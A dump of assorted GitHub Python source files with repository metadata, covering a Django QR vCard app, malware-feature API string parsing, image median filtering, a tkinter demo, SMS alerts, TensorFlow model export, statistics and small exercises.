\")\n resp['msg'] += str(f\"[{field.label}] {error}\")\n\n return HttpResponse(json.dumps(resp), content_type=\"application/json\")\n\n@login_required\ndef view_card(request, pk =None):\n if pk is None:\n return HttpResponse(\"El id de la Vcard es invalido\")\n else:\n context = context_data()\n context['employee'] = models.Employee.objects.get(id=pk)\n return render(request, 'view_id.html', context)\n\n@login_required\ndef view_scanner(request):\n context = context_data()\n return render(request, 'scanner.html', context)\n\n\n@login_required\ndef view_details(request, code = None):\n if code is None:\n return HttpResponse(\"El código de Vcard no es válido\")\n else:\n context = context_data()\n context['employee'] = models.Employee.objects.get(codigo_empleado =code)\n return render(request, 'view_details.html', context)\n\n@login_required\ndef delete_employee(request, pk=None):\n resp = { 'status' : 'failed', 'msg' : '' }\n if pk is None:\n resp['msg'] = \"No se han enviado datos a la solicitud.\"\n else:\n try:\n models.Employee.objects.get(id=pk).delete()\n resp['status'] = 'success'\n messages.success(request, 'La Vcard ha sido eliminada con éxito.')\n except:\n resp['msg'] = \"La Vcard no se pudo eliminar.\"\n\n return HttpResponse(json.dumps(resp), content_type=\"application/json\")\n","repo_name":"jgonzalezr2021/proyecto-Qr","sub_path":"proyectoQr/eqrApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34343616630","text":"# 开发者: Hei Guang\n# 开发时间:2022/10/20 20:28\nimport csv\nimport os\n\nif __name__ == '__main__':\n dir = '/Volumes/西数S770/2022_malware_feature'\n list=[]\n i = 0\n for file in os.listdir(dir):\n if \"API\" in file:\n i = i + 1\n try:\n with open(dir + os.sep + file, 'r', encoding='utf8') as fp:\n line = fp.readline().split(';')[0]\n while line:\n if 'androidx' in line and line not in list:\n with open(\"logsuccess.txt\",\"a\") as success:\n success.write(line.replace('/','.').strip('L')+\"\\n\")\n list.append(line)\n print(line)\n line = fp.readline().split(';')[0]\n fp.close()\n except Exception as e:\n with open(\"logerror.txt\",'a') as record:\n record.write(str(e)+\"\\t\\t\\t\\t\"+file+\"\\n\")\n\n\nprint('已经解析' + str(i) + \"个文件\")\nprint('解析出得api为:'+'\\n'+list)","repo_name":"heiguang1234/Xmal-master","sub_path":"Code/wirte_csv.py","file_name":"wirte_csv.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34165775277","text":"import datetime\nimport cv2\nimport numpy as np\nimport math\n\ncap = cv2.VideoCapture('vids/people_walking.mp4')\n\nframes = []\ncounter = 0\n\nlength = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n\nw = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\nh = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n\nwhile(cap.isOpened()):\n\n\n ret, frame = cap.read()\n\n if counter % math.floor(length/15) == 0:\n frames.append(frame)\n\n\n if ret == False:\n frames.pop()\n break\n\n counter +=1\n\ncap.release()\n\ncv2.destroyAllWindows()\n\n\nprint(\"number of frames\", len(frames))\n\n# median\nnp_frames = np.array(frames)\n\n\nfinal_img = np.median(np_frames, axis=0)\n\n#%%\ncv2.imwrite(f'output/image{datetime.datetime.now()}.jpg', final_img)\ncv2.imshow('Frame',final_img/255)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n# 
%%\n","repo_name":"matty5567/ImageCleaner","sub_path":"median.py","file_name":"median.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8307760231","text":"#!/usr/bin/env python3\n\nfrom tkinter import *\nfrom tkinter import ttk\n\n# GUI: Graphical User Interface\n# tkinter is a Python \"wrapper\" around Tcl/Tk GUI framework.\n#\n# To run a basic demo and test if it's working\n# on your system, run the following command:\n# python -m tkinter\n\n# create a root widget\nroot = Tk()\n\n# set the window title\nroot.title(\"SITPAS\")\n\n# Background color\nroot.configure(background=\"blue\")\n\n# Smallest size it can be\nroot.minsize(500, 500) # width, height\n\n# Largest size it can be\nroot.maxsize(1000, 1000)\n\n# Where the window starts on the screen\nroot.geometry(\"300x300+50+50\") # width x height + x + y\n\n# There are several ways to place stuff in the GUI\n# .pack() : relative to other items, auto-decided by Tk\n# .grid() : more precise\n\n# Create some text labels\nLabel(root, text=\"What's your label\").pack()\n# label_1.pack()\nlabel_2 = Label(root, text=\"this is a label too\")\nlabel_2.pack()\n\n# add a image file\nimage = PhotoImage(file=\"labtocat.png\", height=300, width=300)\nimage.zoom(2)\nimg = Label(root, image=image) # images are associated with labels\nimg.pack()\n\ndef killProgram():\n root.destroy()\n\n# Add a button to exit the program\nfrm = ttk.Frame(root, padding=10)\nfrm.pack()\nLabel(frm, text=\"Hello World!\").pack()\nButton(frm, text=\"Quit\", command=killProgram).pack()\n\n# start the gui\nroot.mainloop()\n","repo_name":"GhostofGoes/SITPAS","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14371830059","text":"import boto3\nimport json\n\nfrom notification.globalutils import sns_client, logger\n\n\nclass Send_Sms:\n\n def sms_send(self, alert_info):\n '''\n This method is to send alerts using mobile\n '''\n\n mobile_numbers = json.loads(alert_info['mobile_num'])\n\n for number in mobile_numbers:\n number = '+1' + str(number)\n\n logger.info(\n 'An alert is being sent for the mobile number {0}'.format(number))\n\n if 'asin' in alert_info:\n amazon_link = 'https://www.amazon.com/dp/{0}'.format(\n alert_info['asin'])\n\n amazon_orbit_link = 'https://app.amzorbit.com/#/product/{0}'.format(\n alert_info['product_id'])\n\n links = \" [View On AmzOrbit: {0}] [View On Amazon: {1}]\".format(\n amazon_orbit_link, amazon_link)\n\n attributes = ', '.join(json.loads(\n alert_info['diffAttributes']))\n\n message = alert_info['message'] + \":\" + \\\n ' {0}'.format(attributes)\n\n message = \"Amzorbit Alert for {0}: {1} {2} {3} \".format(\n alert_info['asin'], message, (alert_info['title'][:20])+'..', links)\n else:\n message = alert_info['message']\n\n response = sns_client.publish(\n PhoneNumber=number, Message=message)\n\n logger.info('An alert is sent using sns client with the response {0}'.format(\n json.dumps(response)))\n","repo_name":"rnama22/amzorbit","sub_path":"notificationmanagement/notification/sms/send_sms.py","file_name":"send_sms.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"10550558487","text":"#!/usr/bin/env python2.7\n\"\"\"Read checkpoint and export model.\n\nUsage: lead_saved.py [--model_version=x] 
[--checkpoint_dir=y] export_dir\n\"\"\"\n\nimport os.path\nimport sys\nimport tensorflow as tf \nimport numpy as np\nfrom tensorflow.contrib import learn\n\ntf.app.flags.DEFINE_integer('model_version', 1, 'version number of the model.')\ntf.app.flags.DEFINE_string('checkpoint_dir', None, 'checkpoint directory.')\n\n# Model Hyperparameters\ntf.app.flags.DEFINE_integer(\"embedding_dim\", 300, \"Dimensionality of character embedding (default: 300)\")\ntf.app.flags.DEFINE_string(\"filter_sizes\", 5, \"Comma-separated filter sizes (default: '3,4,5')\")\ntf.app.flags.DEFINE_integer(\"num_filters\", 5, \"Number of filters per filter size (default: 128)\")\n\nFLAGS = tf.app.flags.FLAGS\n\nNUM_TOP_CLASSES = 2\n\ndef export():\n\tif len(sys.argv) < 3 or sys.argv[-1].startswith('-'):\n\t\tprint('Usage: lead_prediction_saved.py [--model_version=x] [--checkpoint_dir=y] export_dir')\n\t\tsys.exit(-1)\n\tif FLAGS.model_version <= 0:\n\t\tprint ('Please specify a positive value for version number.')\n\t\tsys.exit(-1)\n\n\t# Read the lasted checkpoint and vocab of the model\n\tcheckpoint_file = tf.train.latest_checkpoint(FLAGS.checkpoint_dir)\n\n\tvocab_file = os.path.join(FLAGS.checkpoint_dir, \"vocab\")\n\tvocab_processor = learn.preprocessing.VocabularyProcessor.restore(vocab_file)\n\ttest = \"tmp\"\n\tx_test = np.array(list(vocab_processor.transform(test)))\n\tsequence_length = x_test.shape[1]\n\n\tgraph = tf.Graph()\n\twith graph.as_default():\n\t\t# Input transformation.\n\t\tserialized_tf_example = tf.placeholder(tf.string,name='tf_example')\n\t\tfeature_configs = {'input_x': tf.FixedLenFeature(shape=[sequence_length], dtype=tf.float32)}\n\t\ttf_example = tf.parse_example(serialized_tf_example, feature_configs)\n\t\tinput_x = tf.identity(tf_example['input_x'],name='input_x')\n\n\t\t# Run inference.\n\t\twith tf.Session() as sess:\n\t\t\tsaver = tf.train.import_meta_graph(\"{}.meta\".format(checkpoint_file))\n\t\t\tsaver.restore(sess, checkpoint_file)\n\t\t\t\n\t\t\t# Read embedding layer\n\t\t\tW_embedding = graph.get_operation_by_name(\"embedding/W\").outputs[0]\n\t\t\tembedded_chars = tf.nn.embedding_lookup(W_embedding, tf.to_int32(input_x))\n\t\t\tembedded_chars_expanded = tf.expand_dims(embedded_chars, -1)\n\n\t\t\t# Read convolution + maxpool layer\n\t\t\tfilter_shape = [FLAGS.filter_sizes, FLAGS.embedding_dim, 1, FLAGS.num_filters]\n\t\t\tW_conv_maxpool_5 = graph.get_operation_by_name(\"conv-maxpool-5/W\").outputs[0]\n\t\t\tb_conv_maxpool_5 = graph.get_operation_by_name(\"conv-maxpool-5/b\").outputs[0]\n\t\t\tconv_maxpool_5 = tf.nn.conv2d(embedded_chars_expanded, W_conv_maxpool_5, strides=[1,1,1,1], padding=\"VALID\")\n\t\t\th_conv_maxpool_5 = tf.nn.relu(tf.nn.bias_add(conv_maxpool_5, b_conv_maxpool_5))\n\t\t\tpooled_conv_maxpool_5 = tf.nn.max_pool(h_conv_maxpool_5,ksize=[1,sequence_length-FLAGS.filter_sizes+1, 1, 1], strides=[1,1,1,1], padding=\"VALID\")\n\t\t\th_pool_flat = tf.reshape(pooled_conv_maxpool_5,[-1,FLAGS.num_filters])\n\n\t\t\t# Read final score and prediction layer\n\t\t\tW_output = graph.get_operation_by_name(\"output/W\").outputs[0]\n\t\t\tb_output = graph.get_operation_by_name(\"output/b\").outputs[0]\n\t\t\tscores = tf.nn.xw_plus_b(h_pool_flat, W_output, b_output)\n\t\t\tfinal_scores = tf.nn.softmax(scores)\n\n\t\t\tvalues, indices = tf.nn.top_k(final_scores, NUM_TOP_CLASSES)\n\t\t\ttable = tf.contrib.lookup.index_to_string_table_from_tensor(tf.constant([\"Bad\", \"Good\"]))\n\t\t\tprediction_classes = table.lookup(tf.to_int64(indices))\n\n\t\t\t# Export inference 
model.\n\t\t\texport_path_base = sys.argv[-1]\n\t\t\toutput_path = os.path.join(tf.compat.as_bytes(export_path_base),tf.compat.as_bytes(str(FLAGS.model_version)))\n\t\t\tprint(\"Exporting trained model to {}\".format(output_path))\n\t\t\tbuilder = tf.saved_model.builder.SavedModelBuilder(output_path)\n\n\t\t\t# Build the signature_def_map.\n\t\t\tclassify_inputs_tensor_info = tf.saved_model.utils.build_tensor_info(serialized_tf_example)\n\t\t\tclasses_output_tensor_info = tf.saved_model.utils.build_tensor_info(prediction_classes)\n\t\t\tscores_output_tensor_info = tf.saved_model.utils.build_tensor_info(values)\n\n\t\t\tclassification_signature = (tf.saved_model.signature_def_utils.build_signature_def(inputs={tf.saved_model.signature_constants.CLASSIFY_INPUTS:classify_inputs_tensor_info},\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\toutputs={tf.saved_model.signature_constants.CLASSIFY_OUTPUT_CLASSES:classes_output_tensor_info,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\ttf.saved_model.signature_constants.CLASSIFY_OUTPUT_SCORES:scores_output_tensor_info},\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tmethod_name=tf.saved_model.signature_constants.CLASSIFY_METHOD_NAME))\n\t\t\tpredict_inputs_tensor_info = tf.saved_model.utils.build_tensor_info(input_x)\n\t\t\tprediction_signature = (tf.saved_model.signature_def_utils.build_signature_def(inputs={'texts':predict_inputs_tensor_info},\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\toutputs={'classes': classes_output_tensor_info,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t'scores':scores_output_tensor_info},\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tmethod_name=tf.saved_model.signature_constants.PREDICT_METHOD_NAME))\n\t\t\tlegacy_init_op = tf.group(tf.tables_initializer(), name='legacy_init_op')\n\t\t\tbuilder.add_meta_graph_and_variables(sess, [tf.saved_model.tag_constants.SERVING],signature_def_map={'predict_texts':prediction_signature, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\ttf.saved_model.signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY:classification_signature},\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tlegacy_init_op=legacy_init_op)\n\t\t\tbuilder.save()\n\t\t\tprint (\"Done Exporting!\")\n\n\ndef main(unused_argv=None):\n\texport()\n\n\nif __name__ == '__main__':\n\ttf.app.run()\n\n\t","repo_name":"MingCong18/Lead_Quality_Prediction","sub_path":"lead_saved.py","file_name":"lead_saved.py","file_ext":"py","file_size_in_byte":5471,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"4893206180","text":"#! 
/usr/bin/env python\n\nfrom functools import reduce\nimport math\nimport numpy\nimport scipy.optimize\n\ndef beta_binomial_density(params, n, k):\n\n alpha = params[0]\n beta = params[1]\n\n tempD = math.lgamma(n + 1) - math.lgamma(k + 1) - math.lgamma(n - k + 1)\n tempD = tempD - math.lgamma(n + alpha + beta) + math.lgamma(k + alpha) + math.lgamma(n - k + beta)\n tempD = tempD + math.lgamma(alpha + beta) - math.lgamma(alpha) - math.lgamma(beta) \n\n return math.exp(tempD)\n\ndef beta_binom_pvalue(params, n, k):\n\n tempPV = 0\n for kk in range(k, n + 1):\n\n currentValue = beta_binomial_density(params, n, kk)\n tempPV = tempPV + currentValue\n\n\n return tempPV\n\n\ndef beta_binomial_loglikelihood(params, Ns, Ks):\n\n \"\"\"Calculating log-likelihood of beta-binomial distribution\n\n Args:\n params (List[float]): the parameter of beta distribution ([alpha, beta])\n \n As (numpy.array([int])): the counts for success\n \n Bs (numpy.array([int])): the counts of trials\n\n \"\"\"\n\n alpha = params[0] \n beta = params[1]\n\n ML = 0\n ML = ML + reduce(lambda a, b: a + math.lgamma(b), numpy.r_[0, Ns + 1])\n ML = ML - reduce(lambda a, b: a + math.lgamma(b), numpy.r_[0, Ks + 1])\n ML = ML - reduce(lambda a, b: a + math.lgamma(b), numpy.r_[0, Ns - Ks + 1])\n \n ML = ML - reduce(lambda a, b: a + math.lgamma(b), numpy.r_[0, Ns + alpha + beta])\n ML = ML + reduce(lambda a, b: a + math.lgamma(b), numpy.r_[0, Ks + alpha])\n ML = ML + reduce(lambda a, b: a + math.lgamma(b), numpy.r_[0, Ns - Ks + beta])\n\n ML = ML + len(Ns) * (math.lgamma(alpha + beta) - math.lgamma(alpha) - math.lgamma(beta))\n\n\n # Here, we set the penalty term of alpha and beta (0.5 is slightly arbitray...)\n ML = ML - 0.5 * math.log(alpha + beta)\n return -ML\n\n \n\ndef fit_beta_binomial(As, Bs):\n\n \"\"\"Obtaining maximum likelihood estimator of beta-binomial distribution\n\n Args:\n As (numpy.array([int])): the counts for success\n \n Bs (numpy.array([int])): the counts of trials\n\n \"\"\"\n\n result = scipy.optimize.fmin_l_bfgs_b(beta_binomial_loglikelihood,\n [20, 20],\n args = (As, Bs),\n approx_grad = True,\n bounds = [(0.1, 10000000), (1, 10000000)])\n\n return result[0]\n\n\n\n\n","repo_name":"Genomon-Project/EBFilter","sub_path":"ebfilter/beta_binomial.py","file_name":"beta_binomial.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"2731037916","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the strangeCounter function below.\ndef strangeCounter(time):\n\n t = 3\n v = 3\n\n while t < time:\n \n v*=2\n t = t+v\n \n if t>=time:\n v = t-time+1\n\n \n\n\n return v\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n t = int(input())\n\n result = strangeCounter(t)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"Kumbong/hackerrank","sub_path":"algorithms/Python/implementation/strange counter.py","file_name":"strange counter.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"76"} +{"seq_id":"21294908065","text":"import sys\nfrom collections import deque\n\nn, m = map(int, sys.stdin.readline().split())\nmaze = [sys.stdin.readline().rstrip() for _ in range(n)]\nmove = ((1, 0), (-1, 0), (0, 1), (0, -1))\nvisited = [[0]*m for _ in range(n)]\nvisited[0][0] = 1\nq = deque([(0, 0)])\n\nwhile q:\n x, y = q.popleft()\n for dx, dy in move:\n nx, ny = 
x+dx, y+dy\n        if 0 <= nx < n and 0 <= ny < m and maze[nx][ny]=='1' and not visited[nx][ny]:\n            visited[nx][ny] = visited[x][y] + 1\n            q.append((nx, ny))\n\nprint(visited[n-1][m-1])","repo_name":"speciling/ps-study","sub_path":"2주차/지연우/2178 미로탐색.py","file_name":"2178 미로탐색.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"25080757652","text":"__author__ = '116031030'\r\nimport math\r\n\r\ndef result(shape, perimeter, area):\r\n    print('The perimeter of this {} is {} and the area is {}.\\n'.format(shape, perimeter, area))\r\n\r\ndef circumference_perimeter(radius):\r\n    return 2 * math.pi * radius\r\n\r\ndef circumference_area(radius):\r\n    return math.pi * radius ** 2\r\n\r\ndef circumference():\r\n    radius = eval(input('What is the circumference radius? '))\r\n    perimeter = circumference_perimeter(radius)\r\n    area = circumference_area(radius)\r\n    result('circumference', perimeter, area)\r\n\r\ndef triangle_perimeter(side1, side2, side3):\r\n    perimeter = side1 + side2 + side3\r\n    return perimeter\r\n\r\ndef triangle_area(a, b, c):\r\n    s = triangle_perimeter(a, b, c)\r\n    s /= 2\r\n    area = (s * (s - a) * (s - b) * (s - c)) ** 0.5\r\n    return area\r\n\r\ndef triangle():\r\n    side1 = eval(input('Side 1: '))\r\n    side2 = eval(input('Side 2: '))\r\n    side3 = eval(input('Side 3: '))\r\n    area = triangle_area(side1, side2, side3)\r\n    perimeter = triangle_perimeter(side1, side2, side3)\r\n    result('triangle', perimeter, area)\r\n\r\ndef rectangle_perimeter(a, b):\r\n    return 2 * a + 2 * b\r\n\r\ndef rectangle_area(a, b):\r\n    return a * b\r\n\r\ndef rectangle():\r\n    side1 = eval(input('Side 1: '))\r\n    side2 = eval(input('Side 2: '))\r\n    area = rectangle_area(side1, side2)\r\n    perimeter = rectangle_perimeter(side1, side2)\r\n    result('rectangle', perimeter, area)\r\n\r\nshape = 0\r\n\r\nwhile shape != 4:\r\n    shape = int(input('Choose the shape: \\n'\r\n                      '1 - Circumference \\n'\r\n                      '2 - Triangle \\n'\r\n                      '3 - Rectangle \\n'\r\n                      '4 - Exit\\n'))\r\n\r\n    if shape == 1:\r\n        circumference()\r\n\r\n    elif shape == 2:\r\n        triangle()\r\n\r\n    elif shape == 3:\r\n        rectangle()\r\n\r\n","repo_name":"majard/prog1-uff-2016.1","sub_path":"Geometry.py","file_name":"Geometry.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20364504394","text":"from math import pi as PI, sin, cos, sqrt\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.animation import FuncAnimation\r\n\r\ndef update(frame):\r\n    t = frame/FPS\r\n    anpha = A0*cos(OMEGA*t - PI)\r\n    x, y = L*sin(anpha), L*(1 - cos(anpha))\r\n\r\n    ax.clear()\r\n    ax.axis(\"equal\"); ax.axis(\"off\")\r\n    ax.set_xlim([-1.1*L*sin(A0), 1.1*L*sin(A0)])\r\n    ax.set_ylim([-0.1*L, 1.1*L])\r\n    ax.plot([0, x], [L, y], color=\"black\", linewidth=1)\r\n    ax.plot([x], [y], \"o\", color=\"red\", markersize=10)\r\n\r\nL = 1 # pendulum string length (m)\r\nOMEGA = sqrt(9.81/L) # angular frequency (rad/s)\r\nT = 2*PI/OMEGA # oscillation period (s)\r\nA0 = PI/15 # angular amplitude (rad)\r\nFPS = 24 # frames per second\r\n\r\nfig, ax = plt.subplots()\r\nani = FuncAnimation(fig, update, interval=1000//FPS, frames=round(T*FPS))\r\nani.save(\"con_lac_don.gif\", 
writer=\"pillow\")\r\nprint(\"Done!\")\r\n","repo_name":"vqhBook/python","sub_path":"lesson13/con_lac_don.py","file_name":"con_lac_don.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"76"} +{"seq_id":"73824188726","text":"import pandas as pd\nimport time\nfrom sklearn.metrics import mean_squared_error\nfrom math import sqrt\nimport matplotlib.pyplot as plt\nimport statsmodels.tsa.holtwinters as ets\n\ndef model_building(train_data, test_data):\n\n\tprint(\"\\nImplementing Simple Exponential Smoothing model and training the model...\")\n\tses_train = ets.ExponentialSmoothing(train_data, trend=None, damped=False, seasonal=None).fit()\n\tses_test = ses_train.forecast(steps=len(test_data))\n\tses_test = pd.DataFrame(ses_test).set_index(test_data.index)\n\ttime.sleep(7)\n\n\tprint(\"\\nTest results are...\")\n\ttime.sleep(3)\t\n\tprint(ses_test)\n\ttime.sleep(5)\n\n\tprint(\"\\nPloting results into graph and visualizing it...\")\n\ttime.sleep(4)\n\tfigl, ax = plt.subplots(figsize=(20,7))\n\t#ax.plot(train_data, label=\"train\")\n\tax.plot(test_data, label=\"test data\")\n\tax.plot(ses_test, label=\"ses-test prediction\")\n\tplt.legend(loc=\"upper left\")\n\tplt.title(\"Exponential Smoothing Method\")\n\tplt.ylabel(\"Score\")\n\tplt.xlabel(\"Year\")\n\tplt.rcParams.update({'font.size': 15})\n\tplt.show()\n\t\n\tprint(\"\\nCalculating RMSE value...\")\n\ttime.sleep(3)\n\trms_ses = sqrt(mean_squared_error(test_data, ses_test))\n\tprint(\"RMSE value for Simple Exponential Smoothing is : \"+str(rms_ses))\n\t\n\treturn rms_ses\n","repo_name":"JayVora314/Platform-Vulnerabilities-Prediction-using-Time-Series-Analysis","sub_path":"model_ses.py","file_name":"model_ses.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"10840887570","text":"#!/usr/bin/python\n\n# Author: Andrew Selzer\n# Purpose: Simple function to use recursion to find the factorial of a number.\n\nprint (\"Type factorial(number) to use this program.\")\n\ndef factorial(x):\n if x < 2:\n return 1\n else:\n return x * factorial(x-1)","repo_name":"afs2015/SmallPythonProjects","sub_path":"FunPythonProjects/FindFactorial.py","file_name":"FindFactorial.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18039230658","text":"import os\nfrom pydantic import BaseSettings\nfrom dotenv import load_dotenv, find_dotenv\n\nload_dotenv(find_dotenv())\n\n\nclass Settings(BaseSettings):\n server_host: str = os.getenv(\"SERVER_HOST\")\n server_port: int = os.getenv(\"SERVER_PORT\")\n database_url: str = os.getenv(\"DATABASE_URL\")\n\n\nsettings = Settings(\n _env_file='../.env',\n _env_file_encoding='utf-8',\n)","repo_name":"BondarenkoDV/fastapi_rabbitmq_tornado","sub_path":"servicedb/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41199221524","text":"'''\nCreated on Sep 18, 2014\n\n@author: Eddie Pantridge, Hampshire College F2012\n'''\nimport util\nimport Pysh.instructions.common\n\ndef delete_prev_paren_pair(prog):\n '''\n Deletes the last closed paren pair from prog, which may be a partial program.\n '''\n reversed_prog = prog[::-1]\n new_prog = []\n number_close_parens = 0\n found_first_close = False\n looping = 
True\n    while looping:\n        #Check if reversed-prog is empty, in which case we are done\n        if len(reversed_prog) == 0:\n            return new_prog[::-1]\n        #Check if done, which is if we've found the first :close, the paren-stack is empty, and the first item in reversed-prog is :open\n        elif found_first_close and number_close_parens == 0 and reversed_prog[0] == ':open':\n            temp = new_prog + reversed_prog[1:]\n            return temp[::-1]\n        #Check if looking for the correct :open but found an :open for a different paren\n        elif found_first_close and 0 < number_close_parens and reversed_prog[0] == ':open':\n            new_prog = new_prog + [reversed_prog[0]]\n            reversed_prog = reversed_prog[1:]\n            number_close_parens -= 1\n        #Check if looking for correct :open but found another :close\n        elif found_first_close and reversed_prog[0] == ':close':\n            new_prog = new_prog + [reversed_prog[0]]\n            reversed_prog = reversed_prog[1:]\n            number_close_parens += 1\n        #Check if just found first :close. In which case skip it and set the found-first-close flag\n        elif not found_first_close and reversed_prog[0] == ':close':\n            reversed_prog = reversed_prog[1:]\n            number_close_parens = 0\n            found_first_close = True\n        #Otherwise, just put the item onto new-prog (before advancing) and keep looking with same other variables\n        else:\n            new_prog = new_prog + [reversed_prog[0]]\n            reversed_prog = reversed_prog[1:]\n        \ndef translate_plush_genome_to_push_program(argmap):\n    '''\n    Takes as input an individual (or map) containing a Plush genome (:genome)\n    and translates it to the correct Push program with\n    balanced parens. The linear Plush genome is made up of a list of instruction\n    maps, each including an :instruction key as well as other epigenetic marker\n    keys. As the linear Plush genome is traversed, each instruction that requires\n    parens will push :close and/or :close-open onto the paren-stack, and will\n    also put an open paren after it in the program. For example, an instruction\n    that requires 3 paren groupings will push :close, then :close-open, then :close-open.\n    When a positive number is encountered in the :close key of the\n    instruction map, it is set to num-parens-here during the next recur. This\n    indicates the number of parens to put here, if need is indicated on the\n    paren-stack. If the top item of the paren-stack is :close, a close paren\n    will be inserted. 
If the top item is :close-open, a close paren followed by\n    an open paren will be inserted.\n    If the end of the program is reached but parens are still needed (as indicated by\n    the paren-stack), parens are added until the paren-stack is empty.\n    Instruction maps that have :silence set to true will be ignored entirely.\n    '''\n    if argmap['program'] != None:\n        return argmap['program']\n    else:\n        prog = []\n        gn = argmap['genome']\n        num_parens_here = 0\n        paren_stack = []\n        \n        while(True):\n            # Check if need to add close parens here\n            if 0 < num_parens_here:\n                if paren_stack[0] == ':close':\n                    prog = prog + [':close']\n                elif paren_stack[0] == ':close-open':\n                    prog = prog + [':close']\n                    prog = prog + [':open']\n                num_parens_here -= 1\n                paren_stack = paren_stack[1:]\n            # Check if at end of program but still need to add parens\n            elif len(gn) == 0 and len(paren_stack) > 0:\n                num_parens_here = len(paren_stack)\n            # Check if done\n            elif len(gn) == 0:\n                return util.open_close_sequence_to_list(prog)\n            # If here, ready for next instruction\n            else:\n                number_parens_group","repo_name":"zbyte64/PyshGP","sub_path":"Pysh/translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":4284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"7252360445","text":"import os\nimport json\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim\nfrom tqdm import tqdm\nfrom utils import decode_ofa_mbv3_to_igraph\nfrom ofa_local.utils import get_net_info, cross_entropy_loss_with_soft_target, cross_entropy_with_label_smoothing\nfrom ofa_local.utils import AverageMeter, accuracy, write_log, mix_images, mix_labels, init_models\n\n__all__ = ['RunManager']\nimport torchvision.models as models\n\n\nclass RunManager:\n\t\n\tdef __init__(self, path, args, net, run_config, init=True, measure_latency=None,\n\t             no_gpu=False, data_loader=None, pp=None):\n\t\tself.path = path\n\t\tself.mode = args.model_name\n\t\tself.net = net\n\t\tself.run_config = run_config\n\t\t\n\t\tself.best_acc = 0\n\t\tself.start_epoch = 0\n\t\t\n\t\tos.makedirs(self.path, exist_ok=True)\n\t\t# dataloader\n\t\tif data_loader is not None:\n\t\t\tself.data_loader = data_loader\n\t\t\tcls_lst = self.data_loader.get_cls_idx()\n\t\t\tself.cls_lst = cls_lst\n\t\telse:\n\t\t\tself.data_loader = self.run_config.valid_loader\n\t\t\tself.data_loader.create_episode()\n\t\t\tcls_lst = self.data_loader.get_cls_idx()\n\t\t\tself.cls_lst = cls_lst\n\t\t\n\t\tstate_dict = self.net.classifier.state_dict()\n\t\tnew_state_dict = {'weight': state_dict['linear.weight'][cls_lst],\n\t\t                  'bias': state_dict['linear.bias'][cls_lst]}\n\t\t\n\t\tself.net.classifier = nn.Linear(1280, len(cls_lst), bias=True)\n\t\tself.net.classifier.load_state_dict(new_state_dict)\n\t\t\n\t\t# move network to GPU if available\n\t\tif torch.cuda.is_available() and (not no_gpu):\n\t\t\tself.device = torch.device('cuda:0')\n\t\t\tself.net = self.net.to(self.device)\n\t\t\tcudnn.benchmark = True\n\t\telse:\n\t\t\tself.device = torch.device('cpu')\n\t\t\n\t\t# net info\n\t\tnet_info = get_net_info(\n\t\t\tself.net, self.run_config.data_provider.data_shape, measure_latency, False)\n\t\tself.net_info = net_info\n\t\tself.test_transform = self.run_config.data_provider.test.dataset.transform\n\n\t\t# criterion\n\t\tif isinstance(self.run_config.mixup_alpha, float):\n\t\t\tself.train_criterion = 